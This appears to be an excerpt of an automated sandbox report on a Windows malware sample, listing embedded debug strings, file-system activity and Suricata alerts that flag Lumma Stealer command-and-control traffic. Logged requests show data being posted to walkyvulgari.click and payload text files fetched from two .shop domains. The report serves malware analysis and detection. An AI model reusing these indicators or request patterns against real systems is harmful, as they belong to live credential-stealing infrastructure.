      Source: Binary string: servicemodelregai.pdb source: appFile.exe
      Source: Binary string: tapiperf.pdbGCTL source: appFile.exe
      Source: Binary string: l2nacp.pdbGCTL source: appFile.exe
      Source: Binary string: licmgr10.pdb source: appFile.exe
      Source: Binary string: nddeapi.pdbGCTL source: appFile.exe
      Source: Binary string: api-ms-win-core-sysinfo-l1-2-1.pdb source: appFile.exe
      Source: Binary string: sppinst.pdb source: appFile.exe
      Source: Binary string: odbcji32.pdbGCTL source: appFile.exe
      Source: Binary string: wshunix.pdbGCTL source: appFile.exe
      Source: Binary string: snmpapi.pdb source: appFile.exe
      Source: Binary string: >ile-l1-1-0.pdb source: appFile.exe
      Source: Binary string: api-ms-win-core-fibers-l1-1-1.pdb source: appFile.exe
      Source: Binary string: IMEDICAPICCPS.pdbGCTL source: appFile.exe
      Source: Binary string: pntw.pdbGCTL source: appFile.exe
      Source: Binary string: SLWGA.pdbUGP source: appFile.exe
      Source: Binary string: msjint40.pdb source: appFile.exe
      Source: Binary string: netfxconfig.pdbGCTL source: appFile.exe
      Source: Binary string: ir41_qc.pdb source: appFile.exe
      Source: Binary string: ir41_qcx.pdb source: appFile.exe
      Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: appFile.exe
      Source: Binary string: odbcbcp.pdb source: appFile.exe
      Source: Binary string: PSModuleDiscoveryProvider.pdb source: appFile.exe
      Source: Binary string: msdatt.pdbGCTL source: appFile.exe
      Source: Binary string: mfdvdec.pdb source: appFile.exe
      Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: appFile.exe
      Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000010.00000002.2153441742.0000000007485000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: storagewmi_passthru.pdbGCTL source: appFile.exe
      Source: Binary string: msdasc.pdb source: appFile.exe
      Source: Binary string: wmiprop.pdbGCTL source: appFile.exe
      Source: Binary string: msafd.pdbGCTL source: appFile.exe
      Source: Binary string: api-ms-win-core-errorhandling-l1-1-1.pdb source: appFile.exe
      Source: Binary string: clb.pdb source: appFile.exe
      Source: Binary string: msdaenum.pdb source: appFile.exe
      Source: Binary string: spnet.pdbGCTL source: appFile.exe
      Source: Binary string: mssip32.pdb source: appFile.exe
      Source: Binary string: SLWGA.pdb source: appFile.exe
      Source: Binary string: msident.pdb source: appFile.exe
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.2149016419.0000000002DCC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ir50_qcx.pdb source: appFile.exe
      Source: Binary string: mscpxl32.pdbGCTL source: appFile.exe
      Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: appFile.exe
      Source: Binary string: VscMgrPS.pdbGCTL source: appFile.exe
      Source: Binary string: syssetup.pdbGCTL source: appFile.exe
      Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: appFile.exe
      Source: Binary string: PerceptionSimulation.ProxyStubs.pdb source: appFile.exe
      Source: Binary string: api-ms-win-service-management-l1-1-0.pdb source: appFile.exe
      Source: Binary string: msdadc.pdbGCTL source: appFile.exe
      Source: Binary string: msvcp60.pdb source: appFile.exe
      Source: Binary string: ndproxystub.pdbGCTL source: appFile.exe
      Source: Binary string: peerdistai.pdb source: appFile.exe
      Source: Binary string: wlanutil.pdb source: appFile.exe
      Source: Binary string: RemoveDeviceElevated.pdbGCTL source: appFile.exe
      Source: Binary string: wsock32.pdb source: appFile.exe
      Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: appFile.exe
      Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: appFile.exe
      Source: Binary string: panmap.pdb source: appFile.exe
      Source: Binary string: odtext32.pdb source: appFile.exe
      Source: Binary string: DelegatorProvider.pdb source: appFile.exe
      Source: Binary string: txfw32.pdb source: appFile.exe
      Source: Binary string: msctfui.pdbGCTL source: appFile.exe
      Source: Binary string: umdmxfrm.pdbGCTL source: appFile.exe
      Source: Binary string: msiltcfg.pdb source: appFile.exe
      Source: Binary string: pntw.pdb source: appFile.exe
      Source: Binary string: lz32.pdbGCTL source: appFile.exe
      Source: Binary string: -l1-1-0.pdb source: appFile.exe
      Source: Binary string: UserDataLanguageUtil.pdbGCTL source: appFile.exe
      Source: Binary string: msiltcfg.pdbGCTL source: appFile.exe
      Source: Binary string: snmpapi.pdbUGP source: appFile.exe
      Source: Binary string: hnetmon.pdbGCTL source: appFile.exe
      Source: Binary string: CHxReadingStringIME.pdbGCTL source: appFile.exe
      Source: Binary string: storprop.pdbGCTL source: appFile.exe
      Source: Binary string: storprop.pdb source: appFile.exe
      Source: Binary string: usbperf.pdbGCTL source: appFile.exe
      Source: Binary string: clb.pdbGCTL source: appFile.exe
      Source: Binary string: winrssrv.pdbGCTL source: appFile.exe
      Source: Binary string: whhelper.pdbGCTL source: appFile.exe
      Source: Binary string: API-MS-Win-Eventing-Controller-L1-1-0.pdb source: appFile.exe
      Source: Binary string: RpcNs4.pdbGCTL source: appFile.exe
      Source: Binary string: SyncHostPS.pdbGCTL source: appFile.exe
      Source: Binary string: winrssrv.pdb source: appFile.exe
      Source: Binary string: msdasc.pdbGCTL source: appFile.exe
      Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: appFile.exe
      Source: Binary string: appxprovisionpackage.pdbGCTL source: appFile.exe
      Source: Binary string: Microsoft.BitLocker.Structures.pdb source: appFile.exe
      Source: Binary string: ir41_qc.pdbGCTL source: appFile.exe
      Source: Binary string: VscMgrPS.pdb source: appFile.exe
      Source: Binary string: sppinst.pdbGCTL source: appFile.exe
      Source: Binary string: usbperf.pdb source: appFile.exe
      Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: appFile.exe
      Source: Binary string: pspluginwkr.pdb source: appFile.exe
      Source: Binary string: svcext.pdbGCTL source: appFile.exe
      Source: Binary string: msrating.pdb source: appFile.exe
      Source: Binary string: softpub.pdb source: appFile.exe
      Source: Binary string: ifsutilx.pdbGCTL source: appFile.exe
      Source: Binary string: winsockai.pdb source: appFile.exe
      Source: Binary string: pcwum.pdb source: appFile.exe
      Source: Binary string: SyncInfrastructurePS.pdbGCTL source: appFile.exe
      Source: Binary string: sppwmi.pdbGCTL source: appFile.exe
      Source: Binary string: IMEDICAPICCPS.pdb source: appFile.exe
      Source: Binary string: msxactps.pdbGCTL source: appFile.exe
      Source: Binary string: ndproxystub.pdb source: appFile.exe
      Source: Binary string: odbcji32.pdb source: appFile.exe
      Source: Binary string: bcdeditai.pdb source: appFile.exe
      Source: Binary string: SyncHostPS.pdb source: appFile.exe
      Source: Binary string: NetworkItemFactory.pdb source: appFile.exe
      Source: Binary string: odbcbcp.pdbGCTL source: appFile.exe
      Source: Binary string: utildll.pdbUGP source: appFile.exe
      Source: Binary string: msafd.pdb source: appFile.exe
      Source: Binary string: api-ms-win-core-localization-l1-2-1.pdb source: appFile.exe
      Source: Binary string: msdaurl.pdb source: appFile.exe
      Source: Binary string: winml.pdb source: appFile.exe
      Source: Binary string: api-ms-win-core-heap-obsolete-l1-1-0.pdb source: appFile.exe
      Source: Binary string: Magnification.pdbGCTL source: appFile.exe
      Source: Binary string: oddbse32.pdb source: appFile.exe
      Source: Binary string: lper.pdb source: appFile.exe
      Source: Binary string: DBnmpntw.pdb source: appFile.exe
      Source: Binary string: SetIEInstalledDateAI.pdbGCTL source: appFile.exe
      Source: Binary string: aspperf.pdbGCTL source: appFile.exe
      Source: Binary string: ODBCCR32.pdbGCTL source: appFile.exe
      Source: Binary string: cca.pdb source: appFile.exe
      Source: Binary string: IEFileInstallAI.pdbGCTL source: appFile.exe
      Source: Binary string: TimeDateMUICallback.pdb source: appFile.exe
      Source: Binary string: RpcNs4.pdb source: appFile.exe
      Source: Binary string: api-ms-win-core-kernel32-legacy-l1-1-1.pdb source: appFile.exe
      Source: Binary string: cmcfg32.pdbGCTL source: appFile.exe
      Source: Binary string: RemoveDeviceElevated.pdb source: appFile.exe
      Source: Binary string: f:\binaries.x86ret\bin\i386\Optimization\opt\wpf\wpfgfx_v0300.pdb source: appFile.exe
      Source: Binary string: SetIEInstalledDateAI.pdb source: appFile.exe
      Source: Binary string: IconCodecService.pdb source: appFile.exe
      Source: Binary string: cmlua.pdbGCTL source: appFile.exe
      Source: Binary string: TTDPlm.pdbGCTL source: appFile.exe
      Source: Binary string: ir50_qcx.pdbGCTL source: appFile.exe
      Source: Binary string: mimofcodec.pdb source: appFile.exe
      Source: Binary string: TimeDateMUICallback.pdbGCTL source: appFile.exe
      Source: Binary string: mssip32.pdbGCTL source: appFile.exe
      Source: Binary string: LAPRXY.pdb source: appFile.exe
      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: appFile.exe
      Source: Binary string: IconCodecService.pdbUGP source: appFile.exe
      Source: Binary string: PrintAdvancedInstaller.pdb source: appFile.exe
      Source: Binary string: netfxconfig.pdb source: appFile.exe
      Source: Binary string: msiwer.pdbGCTL source: appFile.exe
      Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbnMai source: powershell.exe, 00000010.00000002.2153441742.0000000007485000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: PaymentMediatorServiceProxy.pdbGCTL source: appFile.exe
      Source: Binary string: api-ms-win-service-core-l1-1-1.pdb source: appFile.exe
      Source: Binary string: icmp.pdb source: appFile.exe
      Source: Binary string: wmdrmsdk.pdb source: appFile.exe
      Source: Binary string: API-MS-Win-devices-config-L1-1-0.pdb source: appFile.exe
      Source: Binary string: msvidc32.pdbGCTL source: appFile.exe
      Source: Binary string: IA2ComProxy.pdbGCTL source: appFile.exe
      Source: Binary string: cmstplua.pdb source: appFile.exe
      Source: Binary string: l2nacp.pdb source: appFile.exe
      Source: Binary string: spnet.pdb source: appFile.exe
      Source: Binary string: ir50_32.pdbGCTL source: appFile.exe
      Source: Binary string: odpdx32.pdb source: appFile.exe
      Source: Binary string: mscat32.pdbGCTL source: appFile.exe
      Source: Binary string: ztrace_maps.pdbGCTL source: appFile.exe
      Source: Binary string: cmifw.pdbGCTL source: appFile.exe
      Source: Binary string: ifsutilx.pdb source: appFile.exe
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbsx source: powershell.exe, 00000010.00000002.2153365718.0000000007471000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: security.pdbGCTL source: appFile.exe
      Source: Binary string: msvfw32.pdbGCTL source: appFile.exe
      Source: Binary string: storagewmi_passthru.pdb source: appFile.exe
      Source: Binary string: oddbse32.pdbGCTL source: appFile.exe
      Source: Binary string: VirtualDisplayManager.ProxyStubs.pdbGCTL source: appFile.exe
      Source: Binary string: Magnification.pdb source: appFile.exe
      Source: Binary string: API-MS-Win-Core-Kernel32-Private-L1-1-1.pdb source: appFile.exe
      Source: Binary string: SixDofControllerManager.ProxyStubs.pdb source: appFile.exe
      Source: Binary string: IA2ComProxy.pdb source: appFile.exe
      Source: Binary string: PrintAdvancedInstaller.pdbGCTL source: appFile.exe
      Source: Binary string: msdatt.pdb source: appFile.exe
      Source: Binary string: nddeapi.pdb source: appFile.exe
      Source: Binary string: cmstplua.pdbGCTL source: appFile.exe
      Source: Binary string: winml.pdbGCTL source: appFile.exe
      Source: Binary string: DBnmpntw.pdbGCTL source: appFile.exe
      Source: Binary string: lper.pdbGCTL source: appFile.exe
      Source: Binary string: SixDofControllerManager.ProxyStubs.pdbGCTL source: appFile.exe
      Source: Binary string: serialui.pdb source: appFile.exe
      Source: Binary string: msjint40.pdbV source: appFile.exe
      Source: Binary string: icmp.pdbGCTL source: appFile.exe
      Source: Binary string: SAS.pdbGCTL source: appFile.exe
      Source: Binary string: Microsoft.BitLocker.Structures.pdbiC source: appFile.exe
      Source: Binary string: uniplat.pdb source: appFile.exe
      Source: Binary string: h-l1-2-0.pdb source: appFile.exe
      Source: Binary string: security.pdb source: appFile.exe
      Source: Binary string: wshunix.pdb source: appFile.exe
      Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: appFile.exe
      Source: Binary string: licmgr10.pdbUGP source: appFile.exe
      Source: Binary string: tapiperf.pdb source: appFile.exe
      Source: Binary string: syssetup.pdb source: appFile.exe
      Source: Binary string: modemui.pdb source: appFile.exe
      Source: Binary string: api-ms-win-core-xstate-l2-1-0.pdb source: appFile.exe
      Source: Binary string: wmiprop.pdb source: appFile.exe
      Source: Binary string: panmap.pdbGCTL source: appFile.exe
      Source: Binary string: api-ms-win-core-registry-l2-1-0.pdb source: appFile.exe
      Source: Binary string: cca.pdbGCTL source: appFile.exe
      Source: Binary string: mssign32.pdbGCTL source: appFile.exe
      Source: Binary string: ntlanui2.pdb source: appFile.exe
      Source: Binary string: lz32.pdb source: appFile.exe
      Source: Binary string: cmutil.pdbGCTL source: appFile.exe
      Source: Binary string: msdaer.pdb source: appFile.exe
      Source: Binary string: cmcfg32.pdb source: appFile.exe
      Source: Binary string: softpub.pdbGCTL source: appFile.exe
      Source: Binary string: SAS.pdb source: appFile.exe
      Source: Binary string: ntlanui2.pdbGCTL source: appFile.exe
      Source: Binary string: wmcodecdspps.pdb source: appFile.exe
      Source: Binary string: odfox32.pdbGCTL source: appFile.exe
      Source: Binary string: utildll.pdb source: appFile.exe
      Source: Binary string: API-MS-Win-EventLog-Legacy-L1-1-0.pdb source: appFile.exe
      Source: Binary string: mfdvdec.pdbUGP source: appFile.exe
      Source: Binary string: NetworkItemFactory.pdbGCTL source: appFile.exe
      Source: Binary string: LAPRXY.pdbGCTL source: appFile.exe
      Source: Binary string: wsock32.pdbUGP source: appFile.exe
      Source: Binary string: API-MS-Win-Core-Kernel32-Private-L1-1-0.pdb source: appFile.exe
      Source: Binary string: ws2help.pdbGCTL source: appFile.exe
      Source: Binary string: api-ms-win-security-cryptoapi-l1-1-0.pdb source: appFile.exe
      Source: Binary string: txfw32.pdbGCTL source: appFile.exe
      Source: Binary string: sppwmi.pdb source: appFile.exe
      Source: Binary string: SyncInfrastructurePS.pdb source: appFile.exe
      Source: Binary string: cmutil.pdb source: appFile.exe
      Source: Binary string: api-ms-win-core-string-obsolete-l1-1-0.pdb source: appFile.exe
      Source: Binary string: msiwer.pdb source: appFile.exe
      Source: Binary string: bcdeditai.pdbGCTL source: appFile.exe
      Source: Binary string: timezoneai.pdb source: appFile.exe
      Source: Binary string: mspbde40.pdb source: appFile.exe
      Source: Binary string: IEFileInstallAI.pdb source: appFile.exe
      Source: Binary string: msdatl3.pdbGCTL source: appFile.exe
      Source: Binary string: modemui.pdbGCTL source: appFile.exe
      Source: Binary string: peerdistai.pdbGCTL source: appFile.exe
      Source: Binary string: api-ms-win-core-registry-l1-1-0.pdb source: appFile.exe
      Source: Binary string: api-ms-win-core-wow64-l1-1-0.pdb source: appFile.exe
      Source: Binary string: pcwum.pdbGCTL source: appFile.exe
      Source: Binary string: odfox32.pdb source: appFile.exe
      Source: Binary string: wmcodecdspps.pdbGCTL source: appFile.exe
      Source: Binary string: rnr20.pdb source: appFile.exe
      Source: Binary string: shfolder.pdbGCTL source: appFile.exe
      Source: Binary string: mimofcodec.pdbGCTL source: appFile.exe
      Source: Binary string: WSClient.pdb source: appFile.exe
      Source: Binary string: TTDPlm.pdb source: appFile.exe
      Source: Binary string: serialui.pdbGCTL source: appFile.exe
      Source: Binary string: PaymentMediatorServiceProxy.pdb source: appFile.exe
      Source: Binary string: E:\A\_work\2\s\binaries\Win32\Release\msdbg2.pdb source: appFile.exe
      Source: Binary string: msdaurl.pdbGCTL source: appFile.exe
      Source: Binary string: icsigd.pdbGCTL source: appFile.exe
      Source: Binary string: msdaer.pdbGCTL source: appFile.exe
      Source: Binary string: cmlua.pdb source: appFile.exe
      Source: Binary string: msrating.pdbGCTL source: appFile.exe
      Source: Binary string: rnr20.pdbGCTL source: appFile.exe
      Source: Binary string: uniplat.pdbGCTL source: appFile.exe
      Source: Binary string: wlanutil.pdbGCTL source: appFile.exe
      Source: Binary string: serwvdrv.pdbGCTL source: appFile.exe
      Source: Binary string: ir50_32.pdb source: appFile.exe
      Source: Binary string: shfolder.pdb source: appFile.exe
      Source: Binary string: icsigd.pdb source: appFile.exe
      Source: Binary string: aspperf.pdb source: appFile.exe
      Source: Binary string: PSModuleDiscoveryProvider.pdbGCTL source: appFile.exe
      Source: Binary string: mssign32.pdb source: appFile.exe
      Source: Binary string: odtext32.pdbGCTL source: appFile.exe
      Source: Binary string: servicemodelregai.pdbGCTL source: appFile.exe
      Source: Binary string: msdatl3.pdb source: appFile.exe
      Source: Binary string: wmdrmsdk.pdbGCTL source: appFile.exe
      Source: Binary string: msvidc32.pdb source: appFile.exe
      Source: Binary string: WalletProxy.pdbGCTL source: appFile.exe
      Source: Binary string: api-ms-win-core-realtime-l1-1-0.pdb source: appFile.exe
      Source: Binary string: ztrace_maps.pdb source: appFile.exe
      Source: Binary string: msxactps.pdb source: appFile.exe
      Source: Binary string: serwvdrv.pdb source: appFile.exe
      Source: Binary string: PerceptionSimulation.ProxyStubs.pdbGCTL source: appFile.exe
      Source: Binary string: api-ms-win-core-comm-l1-1-0.pdb source: appFile.exe
      Source: Binary string: svcext.pdb source: appFile.exe
      Source: Binary string: timezoneai.pdbGCTL source: appFile.exe
      Source: Binary string: DelegatorProvider.pdbGCTL source: appFile.exe
      Source: Binary string: ir41_qcx.pdbGCTL source: appFile.exe
      Source: Binary string: whhelper.pdb source: appFile.exe
      Source: Binary string: VirtualDisplayManager.ProxyStubs.pdb source: appFile.exe
      Source: C:\Users\user\Desktop\appFile.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\appFile.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\723356\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\723356Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49737 -> 104.21.94.92:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 104.21.94.92:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49733 -> 104.21.94.92:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 104.21.94.92:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 104.21.94.92:443
      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49742 -> 104.21.94.92:443
      Source: Joe Sandbox ViewIP Address: 172.67.214.186 172.67.214.186
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.94.92:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.94.92:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.94.92:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.94.92:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.94.92:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.94.92:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.94.92:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.94.92:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 185.161.251.21:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 172.67.214.186:443
      Source: Network trafficSuricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 172.67.214.186:443 -> 192.168.2.4:49745
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: walkyvulgari.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 76Host: walkyvulgari.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WIIPNN3BBVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18112Host: walkyvulgari.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=88R3F3YBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8721Host: walkyvulgari.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0N3UFN57User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20374Host: walkyvulgari.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IHJ0218SYB1Q9LIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1236Host: walkyvulgari.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DSY32N426ZZ8QQEBTJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1106Host: walkyvulgari.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 111Host: walkyvulgari.click
      Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
      Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipsyzogey.shop
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
      Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipsyzogey.shop
      Source: global trafficDNS traffic detected: DNS query: mzaisLRxVRUnOUQWdGyHcVQZJ.mzaisLRxVRUnOUQWdGyHcVQZJ
      Source: global trafficDNS traffic detected: DNS query: walkyvulgari.click
      Source: global trafficDNS traffic detected: DNS query: cegu.shop
      Source: global trafficDNS traffic detected: DNS query: klipsyzogey.shop
      Source: global trafficDNS traffic detected: DNS query: dfgh.online
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: walkyvulgari.click
      Source: appFile.exeString found in binary or memory: http://TransportHTTP/1.0GETAccept:
      Source: vsv_tool.exe, 00000031.00000002.2943800444.0000000044365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000002.2897136684.0000000000199000.00000004.00000010.00020000.00000000.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000044365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000002.2897136684.0000000000199000.00000004.00000010.00020000.00000000.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000044365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000002.2897136684.0000000000199000.00000004.00000010.00020000.00000000.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000044365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: appFile.exeString found in binary or memory: http://crl.8#
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.drString found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2369930676.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000013.00000003.2376459580.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp, 00000015.00000003.2893489722.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.drString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
      Source: appFile.exe, Ted.com.1.dr, Serious.8.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: appFile.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
      Source: Ted.com.1.dr, Serious.8.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: appFile.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
      Source: appFile.exe, Ted.com.1.dr, Serious.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: Ted.com.1.dr, Serious.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: appFile.exe, Ted.com.1.dr, Serious.8.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: appFile.exeString found in binary or memory: http://crl.globalsign.com/root.crl0G
